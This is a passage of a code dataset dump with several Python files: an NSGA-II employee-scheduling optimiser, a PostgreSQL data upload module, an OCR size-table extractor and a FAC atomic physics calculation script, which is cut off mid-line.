which a < b\nwhile countEdge != numEdge:\n a = random.randint(1,T-1)\n b = random.randint(a+1,T)\n\n # dont add the edge into TPG if its already in there (avoid overlaps)\n if (a,b) not in TPG:\n TPG.append((a,b))\n countEdge += 1\n\n# randomize number of employees\nE = random.randint(10,15)\nemployees = []\n\n# randomize the salary and skills for each employees\nfor i in range(1,E+1):\n salary = round(np.random.normal(10000,1000))\n skills = []\n team = [None]*E\n\n numSkills = random.randint(6,7)\n # because of the malicious usage of i, append operation inserted the wrong i for the Employee object. Changed from i to j.\n for j in range(numSkills):\n r = random.randint(1,S)\n # remove duplication\n while (r in skills):\n r = random.randint(1,S)\n skills.append(r)\n for k in range(1, E+1):\n if k < 1:\n team[k-1] = employees[k-1].team[i-1]\n else:\n team[k-1] = random.random() * 2\n\n # maintain the skill list as sorted\n skills.sort()\n employees.append(Employee(i, salary, skills, team))\n'''\n\n# set the number of objectives (fitnesses)\nnum_objectives = 1\nS = 0 # number of skills. Measure by the maximum value extracted from skillList\nT = 0 # number of tasks\ntasks = [] # task list\nnumEdge = 0 # number of edges in TPG\nTPG = [] # TPG list\nE = 0 # number of employees\nemployees = [] # employees\n\n''' file IO data '''\n# task data\ncostList = []\nskillList = []\n# employee data\nsalaryList = []\nemployeeSkillList = []\nteamList = []\n# TPG data\ntpgEdges = []\n\n''' file IO '''\nwith open(sys.argv[1], 'r') as input:#, open(sys.argv[2], 'w') as output:\n # Task \\n Skills\n input.readline()\n input.readline()\n for line in input:\n if not line.strip():\n break\n skill = eval(line.strip())\n for sn in skill:\n if S < sn:\n S = sn\n skillList.append(skill)\n T += 1\n\n # Cost\n input.readline()\n for line in input:\n if not line.strip():\n break\n costList.append(float(line.strip()))\n\n # Employee \\n Skills\n input.readline()\n input.readline()\n for line in input:\n if not line.strip():\n break\n employee = eval(line.strip())\n for sn in employee:\n if S < sn:\n S = sn\n employeeSkillList.append(employee)\n E += 1\n\n # Salary\n input.readline()\n for line in input:\n if not line.strip():\n break\n salaryList.append(float(line.strip()))\n\n # Team\n input.readline()\n for line in input:\n if not line.strip():\n break\n team = eval(line.strip())\n teamList.append(team)\n\n # generate tasks\n for i in range(1, T+1):\n tasks.append(Task(i, costList[i-1], skillList[i-1]))\n\n # put employee information\n for i in range(1,E+1):\n employees.append(Employee(i, salaryList[i-1], employeeSkillList[i-1], teamList[i-1]))\n\n # TPG\n input.readline()\n tpgEdges = eval(input.readline().strip())\n numEdge = len(tpgEdges)\n TPG = tpgEdges\n\n '''\n for skill in skillList:\n output.write(str(skill))\n output.write(\"\\n\".join(map(str, costList)))\n for employee in employeeList:\n output.write(str(employee))\n output.write(\"\\n\".join(map(str, salaryList)))\n for team in teamList:\n output.write(str(team))\n output.write(\"\\n\".join(map(str, tpgEdges)))\n '''\ninput.close()\n# output.close()\n\nif __name__ == \"__main__\":\n for t in tasks:\n print(t.taskId, t.cost, t.skills)\n for ed in TPG:\n print(ed)\n for e in employees:\n print(e.employeeId, e.salary, e.skills)\n\n#####################instance_generator.py###############################3\n\nS = TypeVar('S')\nR = TypeVar('R')\nclass Operator(Generic[S, R]):\n \"\"\" Class representing operator \"\"\"\n\n __metaclass__ = ABCMeta\n\n @abstractmethod\n def execute(self, source: S) -> R:\n pass\n\n @abstractmethod\n def get_name(self) -> str:\n pass\n\nclass Solution(Generic[S]):\n \"\"\" Class representing solutions \"\"\"\n\n __metaclass__ = ABCMeta\n\n def __init__(self, number_of_objectives: int, number_of_variables: int, variables: List[float], identifier):\n '''\n Constructor. Parameters:\n number_of_variables\n variables: time (in hour) that each employee has been allocated for that hour for such task\n Other elements:\n rank: rank for NSGA-II\n distance: distance for crowding-distance\n '''\n self.number_of_objectives = number_of_objectives\n self.number_of_variables = number_of_variables\n self.lower_bound=[0.0 for _ in range(self.number_of_variables)]\n self.upper_bound =[1.0 for _ in range(self.number_of_variables)]\n\n self.objectives = [0.0 for _ in range(self.number_of_objectives)]\n self.variables = variables\n self.attributes = {}\n self.rank = sys.maxsize\n self.distance = 0.0\n self.identifier=identifier\n\n def __copy__(self):\n '''\n Copying operator\n '''\n new_solution = Solution(\n self.number_of_objectives,\n self.number_of_variables, self.variables, self.identifier)\n new_solution.objectives = self.objectives[:]\n new_solution.rank = self.rank\n new_solution.distance = self.distance\n\n return new_solution\n\n def evaluate(self):\n\n fitness=[]\n object = self\n\n undt =0\n for i in range(T):\n k=0\n for j in range(E):\n k=k+object.variables[i*E+j]\n\n if k==0:\n undt=undt+1\n\n reqsk=0\n for i in tasks:\n s = set([])\n for j in employees:\n if object.variables[(i.taskId-1)*E+j.employeeId-1]>0:\n s = s.union(set(j.skills))\n\n s = set(i.skills)-s\n\n reqsk = reqsk+len(s)\n\n\n\n solvable= 1\n projectduration=0\n unfinished = copy.deepcopy(tasks)\n\n TPG2 = copy.deepcopy(TPG)\n totaloverwork=0\n while (TPG2)!=0:\n V=[]\n depended = []\n for tpg in TPG2:\n if tpg[1] not in depended:\n depended.append(tpg[1])\n\n for f in unfinished:\n if f.taskId not in depended:\n V.append(f)\n overwork=0\n\n if (len(V)==0):\n solvable=0\n break\n dedication=[]\n\n ratio=[]\n dedicationj=[]\n # i=0\n efficiency=0\n for v in V:\n d=0\n for e in employees:\n ded = object.variables[(v.taskId-1)*E+e.employeeId-1]\n dedication.append(ded)\n d = d+ded\n if d==0:\n solvable=0\n break\n dedicationj.append(d)\n\n\n ratio.append(v.cost/d)\n # i=i+1\n\n for e in employees:\n dedsum=0\n for p in V:\n dedsum = dedsum+object.variables[(p.taskId-1)*E+e.employeeId-1]\n if dedsum>1:\n overwork=overwork+dedsum-1\n\n t = min(ratio)\n projectduration = projectduration+t\n i=0\n deleted=[]\n if solvable==0:\n break\n for j in V:\n for un in unfinished:\n if un.taskId == j.taskId:\n un.cost = un.cost - t*dedicationj[i]\n if un.cost<=0.000001:\n deleted.append(j.taskId)\n\n i=i+1\n totaloverwork = totaloverwork +overwork*t\n\n\n for j in unfinished:\n if j.taskId in deleted:\n del unfinished[unfinished.index(j)]\n for tpg in TPG2:\n if (tpg[0] in deleted) or (tpg[1] in deleted):\n del TPG2[TPG2.index(tpg)]\n\n\n projectcost=0\n tkj=[]\n Pei=[]\n for task in tasks:\n #sum=0\n efficiency=0\n #for employee in employees:\n # sum=sum+object.variables[(task.taskId-1)*E+employee.employeeId-1]\n ratio_sum = 0\n for em in range(0,E-1):\n for em2 in range(em,E):\n num = 0\n for sk in task.skills:\n if sk in employees[em].skills or sk in employees[em2].skills:\n num = num + 1\n efficiency = efficiency + employees[em].team[em2]*num/len(task.skills)\n ratio_sum = ratio_sum + num/len(task.skills)\n\n #tkj.append(task.cost/(sum*ration_sum))\n tkj.append(task.cost*efficiency/(2*ratio_sum))\n for employee in employees:\n Pei.append(employee.salary)\n for employee in employees:\n for task in tasks:\n projectcost = projectcost+object.variables[(task.taskId-1)*E+employee.employeeId-1]*tkj[task.taskId-1]*Pei[employee.employeeId-1]\n\n q=projectcost*0.000001+projectduration*0.1\n r=100+10*undt+10*reqsk+0.1*totaloverwork\n\n\n if undt > 0.001 or reqsk > 0.001 or totaloverwork>1:\n fitness.append(1/(q+r))\n else:\n fitness.append(1/q)\n\n self.objectives[0] = fitness[0]\n # evaluate solution and update objective values.\n\n '''\n def crossover(self, other):\n # crossover using such operator\n raise NotImplementedError(\"Solution class have to be implemented\")\n '''\n\n '''\n def mutate(self):\n # mutate with such mutation operator\n raise NotImplementedError(\"Solution class have to be implemented\")\n '''\n\n def __rshift__(self, other):\n '''\n True if this solution dominates the other (\">>\" operator)\n '''\n dominates = False\n for i in range(len(self.objectives)):\n if self.objectives[i] < other.objectives[i]:\n return False\n\n elif self.objectives[i] > other.objectives[i]:\n dominates = True\n\n return dominates\n\n def __lshift__(self, other):\n '''\n True if the other solution dominates this solution (\"<<\" operator)\n '''\n return other >> self\n\nclass Crossover(Operator[List[S], List[R]]):\n \"\"\" Class representing crossover operator. \"\"\"\n\n __metaclass__ = ABCMeta\n\n def __init__(self, probability: float):\n if probability > 1.0:\n raise Exception('The probability is greater than one: {}'.format(probability))\n elif probability < 0.0:\n raise Exception('The probability is lower than zero: {}'.format(probability))\n\n self.probability = probability\n\n @abstractmethod\n def execute(self, source: S) -> R:\n pass\n\nclass SBX(Crossover[Solution, Solution]):\n __EPS = 1.0e-14\n\n def __init__(self, probability: float, distribution_index: float = 20.0):\n super(SBX, self).__init__(probability=probability)\n self.distribution_index = distribution_index\n\n def execute(self, parents: List[Solution]) -> List[Solution]:\n if len(parents) != 2:\n raise Exception('The number of parents is not two: {}'.format(len(parents)))\n\n offspring = [copy.copy(parents[0]), copy.copy(parents[1])]\n rand = random.random()\n if rand <= self.probability:\n for i in range(parents[0].number_of_variables):\n value_x1, value_x2 = parents[0].variables[i], parents[1].variables[i]\n\n if random.random() <= 0.5:\n if abs(value_x1 - value_x2) > self.__EPS:\n if value_x1 < value_x2:\n y1, y2 = value_x1, value_x2\n else:\n y1, y2 = value_x2, value_x1\n\n lower_bound, upper_bound = parents[0].lower_bound[i], parents[1].upper_bound[i]\n\n beta = 1.0 + (2.0 * (y1 - lower_bound) / (y2 - y1))\n alpha = 2.0 - pow(beta, -(self.distribution_index + 1.0))\n\n rand = random.random()\n if rand <= (1.0 / alpha):\n betaq = pow(rand * alpha, (1.0 / (self.distribution_index + 1.0)))\n else:\n betaq = pow(1.0 / (2.0 - rand * alpha), 1.0 / (self.distribution_index + 1.0))\n\n c1 = 0.5 * (y1 + y2 - betaq * (y2 - y1))\n beta = 1.0 + (2.0 * (upper_bound - y2) / (y2 - y1))\n alpha = 2.0 - pow(beta, -(self.distribution_index + 1.0))\n\n if rand <= (1.0 / alpha):\n betaq = pow((rand * alpha), (1.0 / (self.distribution_index + 1.0)))\n else:\n betaq = pow(1.0 / (2.0 - rand * alpha), 1.0 / (self.distribution_index + 1.0))\n\n c2 = 0.5 * (y1 + y2 + betaq * (y2 - y1))\n\n if c1 < lower_bound:\n c1 = lower_bound\n if c2 < lower_bound:\n c2 = lower_bound\n if c1 > upper_bound:\n c1 = upper_bound\n if c2 > upper_bound:\n c2 = upper_bound\n\n if random.random() <= 0.5:\n offspring[0].variables[i] = c2\n offspring[1].variables[i] = c1\n else:\n offspring[0].variables[i] = c1\n offspring[1].variables[i] = c2\n else:\n offspring[0].variables[i] = value_x1\n offspring[1].variables[i] = value_x2\n else:\n offspring[0].variables[i] = value_x1\n offspring[1].variables[i] = value_x2\n return offspring\n\ndef mutation(Solution1, Solution2):\n r = random.random()\n if(r < 0.5):\n r = 1 - pow((2 * (1-r)), (1/7))\n else:\n r = pow(2*r, (1/7)) - 1\n for i in range(T*E):\n '''\n i = random.randint(0, T*E-1)/10\n j = random.randint(0,10)/10\n Solution1.variables[i] = j\n i = random.randint(0, T*E-1)/10\n j = random.randint(0,10)/10\n Solution2.variables[i] = j\n '''\n if random.random() < r:\n j = random.randint(0,5)/10.0\n Solution1.variables[i] = j\n if random.random() < r:\n j = random.randint(0,5)/10.0\n Solution2.variables[i] = j\n return [Solution1, Solution2]\n\nclass NSGA2:\n '''\n Implement parts of NSGA-II\n '''\n\n def __init__(self, num_objectives, num_variables, crossover_rate = 0.9):\n '''\n Constructor. Parameters: number of objectives, number of variables (size of the employee allocation matrix, crossover_rate (default 90%)\n '''\n self.num_objectives = num_objectives\n self.num_variables = num_variables\n self.crossover_rate = crossover_rate\n\n random.seed()\n\n def run(self, P: List[Solution], population_size, num_generations):\n # Run the NSGA-II instance\n\n for s in P:\n s.evaluate()\n\n Q = []\n\n for i in range(num_generations):\n # print(\"Iteration \", i)\n\n # combine parent and offspring\n R = []\n R.extend(P)\n R.extend(Q)\n\n fronts = self.fast_nondominated_sort(R) # front construction\n\n # print(P[0].variables)\n\n del P[:] # make parent P empty\n\n front = []\n for front in fronts.values(): # fill parent until it reaches the size\n ''' for p in front:\n print(p.variables) '''\n if len(front) == 0: # Assert the non-emptyness of the front\n break\n\n self.assign_crowding_distance(front) # assign crowding distance\n P.extend(front)\n\n # print(P[0].variables)\n\n if len(P) >= population_size:\n break\n\n self.sort_crowdingdist(P) # sort by crowding_distance\n\n if len(P) > population_size:\n del P[population_size:]\n ''' for p in P:\n print(p.identifier, p.objectives[0]) '''\n #print(\"Generation\", i)\n if True:\n # print(\"Highest fitness:\", P[0].objectives[0])\n print(P[0].objectives[0], P[len(P)-1].objectives[0])\n #print(\"Lowest fitness:\", P[len(P)-1].objectives[0])\n # print(\"Generation\", i, \": \", P[0].identifier, P[0].objectives[0])\n # print(P[0].variables)\n # print(\"Generation\", i, \": \", P[len(P)-1].identifier, P[len(P)-1].objectives[0])\n\n Q = self.make_offspring(P)\n\n def sort_objective(self, P, obj_idx):\n # sort the popoulation (or the front) by obj_idx'th objective\n P.sort(key=lambda x: x.objectives[obj_idx], reverse=True)\n\n def sort_crowdingdist(self, P):\n # sort the population (or the front) by decreasing order of crowding distance. note that rank order should be preserved.\n P.sort(key=lambda x:x.distance, reverse=True)\n P.sort(key=lambda x:x.rank)\n\n def make_offspring(self, P):\n # make offspring by crossover and mutation\n # selection of parents will be done by random\n Q = []\n crossover = SBX(probability=crossover_rate, distribution_index=18) # initiate crossover instance\n\n while len(Q) < len(P):\n parents = [None, None]\n\n while parents[0] == parents[1]:\n # Additionally on the random choice, select two and pick one by the order of crowded comparison operaor\n for i in range(2):\n # print(len(P))\n s1 = random.choice(P)\n s2 = s1\n while s1 is s2:\n s2 = random.choice(P)\n\n # print(\"s1: \", type(s1).__name__)\n # print(\"s2: \", type(s2).__name__)\n # select what solution is better\n selection = 0\n\n if s1.rank < s2.rank:\n selection = 1\n elif s1.rank > s2.rank:\n selection = -1\n elif s1.distance > s2.distance:\n selection = 1\n elif s1.distance < s2.distance:\n selection = -1\n else:\n selection = 0\n\n if selection > 0:\n parents[i] = s1\n else:\n parents[i] = s2\n\n if random.random() < self.crossover_rate:\n\n child = crossover.execute(parents)\n\n child = mutation(child[0], child[1])\n\n child[0].identifier = len(P) + len(Q)\n child[0].evaluate()\n Q.append(child[0])\n if len(Q) < len(P):\n child[1].identifier = len(P) + len(Q)\n child[1].evaluate()\n Q.append(child[1])\n\n return Q\n\n def fast_nondominated_sort(self, P):\n # discover pareto fronts in P based on non-domination criterion\n fronts = {}\n\n S = {} # Set of dominated instance of each instance p\n n = {} # number of dominating instance of each instance p\n for s in P: # use each instance of P as an index\n S[s] = []\n n[s] = 0\n\n fronts[1] = [] # pareto fronts will be constructed from rank 1\n\n for p in P: # with each instance p,\n for q in P: # compare each instance q for p\n if p is q: # p and q are instances of P, so is works as reference check\n continue\n\n if p >> q: # p dominates q\n S[p].append(q)\n\n elif p << q: # q dominates p\n n[p] += 1\n\n if n[p] == 0:\n p.rank = 1 # rank of this instance is 1\n fronts[1].append(p) # insert this instance to rank 1 front\n\n i = 1\n while len(fronts[i]) != 0: # see each dominated instance of each front\n next_front = []\n for p in fronts[i]:\n for q in S[p]: # find a dominates set q by p\n n[q] -= 1 # domination is recovered\n if n[q] == 0: # no other dominates q anymore\n q.rank = i + 1\n next_front.append(q)\n i += 1\n fronts[i] = next_front # fill the next front\n\n return fronts # return the front\n\n def assign_crowding_distance(self, front):\n '''\n assign a crowding distance for each solution in each front.\n note that front is called as a reference, so changing the value here affects the entire population\n '''\n for p in front:\n p.distance = 0 # distance initialize\n\n for obj_index in range(self.num_objectives):\n self.sort_objective(front, obj_index) # sort by each objective\n\n front[0].distance = front[len(front) - 1].distance = float('inf') # boundary points are always selected\n for i in range(1, len(front) - 1):\n front[i].distance += (front[i+1].distance - front[i-1].distance) # Originally added value should be devided by the difference between the maximum possible fitness value and the minimum possible fitness value, but since we will regulate fitness as smaller than 1, just ignore.\n\n\n#initialize currentpopulation\ncrossover_rate=0.9\npopulationSize=32\nmaxEvaluations=320\nsolution = []\ncurrentPopulation = []\n# currentPopulation = List[Solution]\nevaluations = 0\n\nif __name__ == '__main__':\n # Instantiate nsga2 object\n nsga2=NSGA2(num_objectives, T*E, crossover_rate)\n for i in range(0, populationSize):\n temp=[]\n for j in range(T):\n temp2=[]\n for k in range(E):\n ded = random.randint(0,5)\n ded = ded/10.0\n temp2.append(ded)\n temp = temp+temp2\n individual = Solution(variables=temp, number_of_variables=T*E, number_of_objectives=num_objectives, identifier=i)\n currentPopulation.append(individual)\n\n # print(currentPopulation)\n\n # call NSGA-II instance\n nsga2.run(currentPopulation, populationSize, maxEvaluations)\n\n # record final fitness and variables\n print(\"Final fitness:\", currentPopulation[0].objectives[0])\n print(currentPopulation[0].variables)\n\n","sub_path":"src/nsga2-data2.py","file_name":"nsga2-data2.py","file_ext":"py","file_size_in_byte":26482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"404800673","text":"import pandas as pd\nimport logging\n\nlogger = logging.getLogger('nodes.data_storage')\n\n\ndef update(client, params):\n \"\"\"\n Upload dataframe to database in PostgreSQL.\n \"\"\"\n\n # Soap operas\n table_name = params.novelas.split('.')[0]\n\n df = params.novelas_df\n df.to_sql(table_name, con=client.conn, if_exists='replace', index=False)\n\n # Casting\n table_name = params.casting.split('.')[0]\n\n df = params.cast_df\n df.to_sql(table_name, con=client.conn, if_exists='replace', index=False)\n\n # Images\n table_name = params.features.split('.')[0]\n\n df = params.novelas_df\n df.to_sql(table_name, con=client.conn, if_exists='replace', index=False)\n\n # Feature by soap opera\n table_name = params.color_novela.split('.')[0]\n\n df = params.color_novela_df\n df.to_sql(table_name, con=client.conn, if_exists='replace', index=False)\n\n table_name = params.race_novela.split('.')[0]\n\n df = params.race_novela_df\n df.to_sql(table_name, con=client.conn, if_exists='replace', index=False)\n\n # IBGE\n table_name = params.ibge.split('.')[0]\n\n df = params.ibge_df\n df.to_sql(table_name, con=client.conn, if_exists='replace', index=False)\n\n\ndef done(client, params):\n \"\"\"\n Check whether the table exists in the database AND it is populated.\n \"\"\"\n table_name = params.ibge.split('.')[0]\n\n if client.engine.has_table(table_name):\n result = pd.read_sql(f'SELECT * FROM {table_name} LIMIT 5', con=client.conn)\n\n if result.shape[0] > 0:\n logger.info(f'Table {table_name} found in the database and it is populated. Skipping upload...')\n return True\n\n return False\n","sub_path":"src/nodes/data_storage.py","file_name":"data_storage.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"134874185","text":"import cv2\nimport numpy as np\nfrom PIL import Image\nfrom pytesseract import *\nimport re\nimport pandas as pd\n\nimg = Image.open(r'C:\\Users\\82107\\Desktop\\ocr_test\\ocr테스트이미지.jpg')\ntext = pytesseract.image_to_string(img,lang='kor')\nsize_table = re.split('\\n',text)\nmatchers = ['사이즈(','어깨너비','가슴둘레','소매길이','총장']\nsize = [s for s in size_table if any(xs in s for xs in matchers)]\n\nsize2 = []\nfor i in range(len(size)):\n size2.append(size[i].split())\n \nif '총장' and '소매길이' and '어깨너비' and '가슴둘레' not in size2[1][0] + size2[2][0]+size2[3][0]+size2[4][0]:\n pass\nelse:\n match = re.match(r\"([가-힣]+)([(0-9].+)\", size2[0][0], re.I)\n if match:\n items = match.groups()\n size2[0][0] = items[0]\n\n size3 = list(map(list, zip(*size2))) #리스트를 transpose하는 법\n #import numpy as np\n #np.array(a).T.tolist() - 똑같은 방법 -> array 변환 -> 전치 -> tolist\n df_size = pd.DataFrame(size3[1:], columns = size3[0])\n\nsize3=[]\nfor i in range(len(size2)):\n if len(size2[i]) == len(size2[0]):\n size3.append(size2[i])\n else:\n diff = len(size2[i]) - len(size2[0])\n size3.append(size2[i][diff:])\n\nsize4 = list(map(list, zip(*size3))) #리스트를 transpose하는 법\n\ndf_size = pd.DataFrame(size4[1:], columns = size4[0])\n\nprint(df_size)\n\nwith open(r'C:\\Users\\82107\\Desktop\\file\\testtest', 'w') as file:\n print(df_size, file=file) #size 추출\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()","sub_path":"code/jonggeun.py","file_name":"jonggeun.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"479972825","text":"from optparse import OptionParser\nfrom pfac.fac import *\nfrom time import time\nimport math\nimport os\n\nt0 = time()\n\n#parse cmdline args\np = OptionParser()\np.add_option('-z', '--z', dest='z', type='int',\n default=26, help='atomic number')\np.add_option('-n', '--n', dest='n', type='int',\n default=1, help='number of M-shell electrons')\np.add_option('-p', '--np', dest='np', type='int',\n default=1, help='number of processors')\np.add_option('-m', '--nmax', dest='nmax', type='int',\n default=5, help='max principle quantum number')\np.add_option('-i', '--imax', dest='imax', type='int',\n default=0, help='inner shell excitation')\np.add_option('-v', '--vmax', dest='vmax', type='int',\n default=-8, help='virtual orbital n max')\np.add_option('--n2max', dest='n2max', type='int',\n default=0, help='max n of the 2nd virtual orbital')\np.add_option('-r', '--nr', dest='nr', type='int',\n default=0, help='job id for the n1 split run')\np.add_option('-s', '--nsp', dest='nsp', type='int',\n default=16, help='number of n1s in split jobs')\np.add_option('-t', '--ntr', dest='ntr', type='int',\n default=0, help='mbpt transition rate option')\np.add_option('-k', '--nk', dest='nk', type='int',\n default=-1, help='k shell max excitation')\np.add_option('-c', '--csf', dest='csf', type='int',\n default=0, help='convert to sfac input file')\np.add_option('-a', '--mmax', dest='mm', type='float',\n default=0, help='maximum memory usage for radial integra caching')\np.add_option('-d', '--dry', dest='dry', type='int',\n default=0, help='dry run, stop after configuration setup')\np.add_option('--m3d', dest='m3d', type='int',\n default=0, help='max n of double excitation of M-shell')\np.add_option('--m3i', dest='m3i', type='int',\n default=0, help='max n of double excitation of L-shell')\np.add_option('--oc', dest='oc', type='string',\n default='ic', help='configuration for potential optimization')\np.add_option('--om', dest='om', type='int',\n default=20, help='optimizaiton mode')\np.add_option('--od', dest='od', type='string',\n default='', help='output directory')\np.add_option('--mcc', dest='mcc', type='int',\n default=9, help='maximum n of correlation config')\np.add_option('--mcc2', dest='mcc2', type='int',\n default=9, help='maximum n of correlation config')\np.add_option('--kmax', dest='kmax', type='int',\n default=8, help='max orbital partial wave')\np.add_option('--kcc', dest='kcc', type='int',\n default=8, help='maximum l of correlation config')\np.add_option('--acc', dest='acc', type='float',\n default=0.05, help='correlation mixing threshold')\np.add_option('--acc2', dest='acc2', type='float',\n default=0.05, help='correlation mixing threshold')\np.add_option('--hiter', dest='hiter', type='int',\n default=0, help='hamilton iteration for perturbing configs')\np.add_option('--piter', dest='piter', type='int',\n default=50, help='perturb config iteration to enlarging ci space')\np.add_option('--ptol', dest='ptol', type='float',\n default=0.01, help='perturb config cutoff tolerance')\np.add_option('--expdim', dest='expdim', type='float',\n default=0.05, help='perturb config cutoff tolerance')\np.add_option('--expdimz', dest='expdimz', type='float',\n default=1e-4, help='perturb config cutoff tolerance')\np.add_option('--mcut0', dest='mcut0', type='float',\n default=1e-3, help='correlation mixing threshold')\np.add_option('--mcut1', dest='mcut1', type='float',\n default=1e-1, help='correlation mixing threshold')\np.add_option('--mcut2', dest='mcut2', type='float',\n default=1e-1, help='correlation mixing threshold')\np.add_option('--mcut3', dest='mcut3', type='float',\n default=1.0, help='correlation mixing threshold')\np.add_option('--nrg', dest='nrg', type='int',\n default='1500', help='radial grid points')\np.add_option('--nbr', dest='nbr', type='int',\n default=-3, help='breit max n')\np.add_option('--mbr', dest='mbr', type='int',\n default=0, help='breit mode')\np.add_option('--kbr', dest='kbr', type='int',\n default=0, help='breit min n')\np.add_option('--nse', dest='nse', type='int',\n default=-2, help='self energy maxn')\np.add_option('--mse', dest='mse', type='int',\n default=41, help='self energy mode')\np.add_option('--ci', dest='ci', type='int',\n default=0, help='do ci calculation only')\np.add_option('--bas', dest='bas', type='int',\n default=1, help='print out basis and mixing coeff')\np.add_option('--pj', dest='pj', type='int',\n default=-1, help='symmetry to include')\np.add_option('--pp', dest='pp', type='int',\n default=-1, help='parity to include')\np.add_option('--jmin', dest='jmin', type='int',\n default=-1, help='min 2J to include')\np.add_option('--nj', dest='nj', type='int',\n default=1, help='number of Js to include')\np.add_option('--dnm', dest='dnm', type='int',\n default=0, help='extra delta n for config in ci')\np.add_option('--odn', dest='odn', type='int',\n default=0, help='potential boundary n')\np.add_option('--mcut', dest='mcut', type='float',\n default=0.65, help='mixing coeff cutoff for id levels')\np.add_option('--pm', dest='pm', type='int',\n default=2, help='parallel mode')\np.add_option('--pseudo', dest='pseudo', type='int',\n default=-100, help='use pseudo orbital for virtual')\np.add_option('--xdf', dest='xdf', type='float',\n default=-1, help='xdf param for pseudo orb')\np.add_option('--rand', dest='rand', type='int',\n default=11, help='randomize config list')\np.add_option('--warn', dest='warn', type='float',\n default=0.5, help='warn large mbpt terms')\np.add_option('--ignore', dest='ignore', type='float',\n default=50.0, help='ignore large mbpt terms')\np.add_option('--rc', dest='rc', type='string',\n default='', help='read config list')\np.add_option('--rh', dest='rh', type='string',\n default='', help='read hamilton')\np.add_option('--ic', dest='ic', type='string',\n default='', help='individual config')\np.add_option('--itr', dest='itr', type='int',\n default=0, help='compute CI transition rates')\np.add_option('--ice', dest='ice', type='int',\n default=0, help='compute CI excitation')\n\n(opts, args) = p.parse_args()\n\nprint(opts)\n\nif opts.od != '':\n x = os.system('mkdir %s'%opts.od)\nodir = opts.od\nif opts.ic != '':\n if odir == '':\n odir='.'\n odir = '%s/%s'%(odir,opts.ic)\n x = os.system('mkdir %s'%odir)\n \nir = opts.nr\nasym = ATOMICSYMBOL[opts.z]\n\nif opts.csf > 0:\n if ir >= 0:\n ConvertToSFAC('dl%d.sf'%ir)\n else:\n ConvertToSFAC('dl.sf')\n\nif opts.np > 1:\n InitializeMPI(opts.np)\nSetAtom(asym)\n\nn = opts.n \nnmax = opts.nmax\npref='%s%02d'%(asym, n)\nif odir != '':\n pref='%s/%s'%(odir,pref)\n \nif ir >= 0 and opts.ci == 0:\n p0 = '%si%02d'%(pref,ir)\nelif opts.ci > 0:\n p0 = '%sc'%pref\nelse:\n p0 = pref\n\nopts.m3d = min(opts.m3d, opts.nmax)\nopts.m3i = min(opts.m3i, opts.imax)\n\nm3d=opts.m3d\nif opts.rc != '':\n ReadConfig(opts.rc)\n\nn = n-2\ngc=[]\ngc.append('g')\nif opts.rc == '' :\n if n < 3:\n Config('g', '1s2 2s%d'%n)\n else:\n Config('g', '1s2 2s2 2p%d'%(n-2))\n \ngv=['g']\nv3 = []\nv4 = []\nfor m in range(2, nmax+1):\n bc = ['2s', '2p']\n for k0 in range(2):\n for k1 in range(m):\n if m == 2 and k1 <= k0:\n continue\n gn = 'g_n2k%d_n%dk%d'%(k0,m,k1)\n gc.append(gn)\n if m == 2:\n gv.append(gn)\n elif m == 3:\n v3.append(gn)\n elif m == 4:\n v4.append(gn)\n if opts.rc == '':\n Config(1, gn, ['g'], bc[k0], m, m, k1, k1)\ni=1\nfor m in range(2, nmax+1):\n for k0 in range(2):\n for k1 in range(m):\n if m == 2 and k1 <= k0:\n continue\n gn = 'd_n2k%d_n%dk%d'%(k0,m,k1)\n if m <= opts.m3d:\n gc.append(gn)\n #gv.append(gn)\n if opts.rc == '':\n Config(1, gn, [gc[i]], '2*1', 2, 2)\n i = i + 1\ngi=[]\ni0 = len(gc)\nif (opts.imax > 1):\n for m in range(2, opts.imax+1):\n bc = ['1s']\n for k0 in range(1):\n for k1 in range(m):\n gn = 'g_n1k%d_n%dk%d'%(k0, m, k1)\n gc.append(gn)\n if m == 2:\n gi.append(gn)\n if opts.rc == '':\n Config(1, gn, ['g'], bc[k0], m, m, k1, k1)\n i = i0\n for m in range(2, opts.imax+1): \n for k0 in range(1):\n for k1 in range(m):\n gn = 'd_n2k%d_n%dk%d'%(k0,m,k1)\n if m <= opts.m3i:\n gc.append(gn)\n #gi.append(gn)\n if opts.rc == '':\n Config(1, gn, [gc[i]], '2*1', 2, 2)\n i = i + 1\n \nif opts.vmax <= 0:\n n1 = [2, 3, 4, 5, 6, 7, 8, 9, 10, 12, 16, 24, 36, 54, 90]\nelse:\n n1 = list(range(2, opts.vmax+1))\nif opts.n2max <= 0:\n n2 = list(range(9))+[9, 11, 15, 23, 40]\n nn2 = len(n2)\nelse:\n n2 = opts.n2max\n nn2 = n2\n\nif opts.vmax <= 0 and opts.n2max <= 0:\n nvm = n1[-1]+n2[-1]\nelif opts.vmax <= 0:\n if opts.n2max < 1000:\n nvm = n1[-1]+opts.n2max\n else:\n nvm = max(n1[-1], opts.n2max/1000)\nelse:\n if opts.n2max < 1000:\n nvm = opts.vmax+opts.n2max\n else:\n nvm = max(opts.vmax, opts.n2max/1000)\n\nnn = len(n1)\nif opts.pm == 0:\n ncp = 0\n if (opts.nsp <= 0):\n nsp = nn\n ns = [0, nn]\n elif opts.nsp >= nn-1:\n nsp = nn-1\n ns = [0]+list(range(2,len(n1)+1))\n else:\n nsp = opts.nsp\n ns = list(range(0,nn+1,nn/nsp))\n if ns[-1] < nn:\n ns[-1] = nn\n ni = n1[ns[i]:ns[i+1]]\nelse:\n ncp = opts.nsp\n nsp = nn\n ns = [0, nn]\n ni = n1\n \nPrint('n1:', n1)\nPrint('nn1=%d, nn2=%d nsp=%d'%(nn, nn2, nsp))\n\neps = 1e-4\nif (opts.nbr < -1):\n opts.nbr = max(opts.nmax, opts.imax)+abs(opts.nbr)-1\nif (opts.nse < -1):\n opts.nse = max(opts.nmax, opts.imax)+abs(opts.nse)-1\n#QED correction options\nSetVP(103)\nSetMS(3, 3)\nSetSE(opts.nse, opts.mse)\nSetBreit(opts.nbr, opts.mbr, -1, -1, opts.kbr)\n\nPrintNucleus()\nPrintNucleus(1, p0+'a.iso')\nPrintQED()\nPrint('kmax=%d'%opts.kmax)\nPrint('ns=%d'%(len(ns)-1))\nPrint(ns)\nif 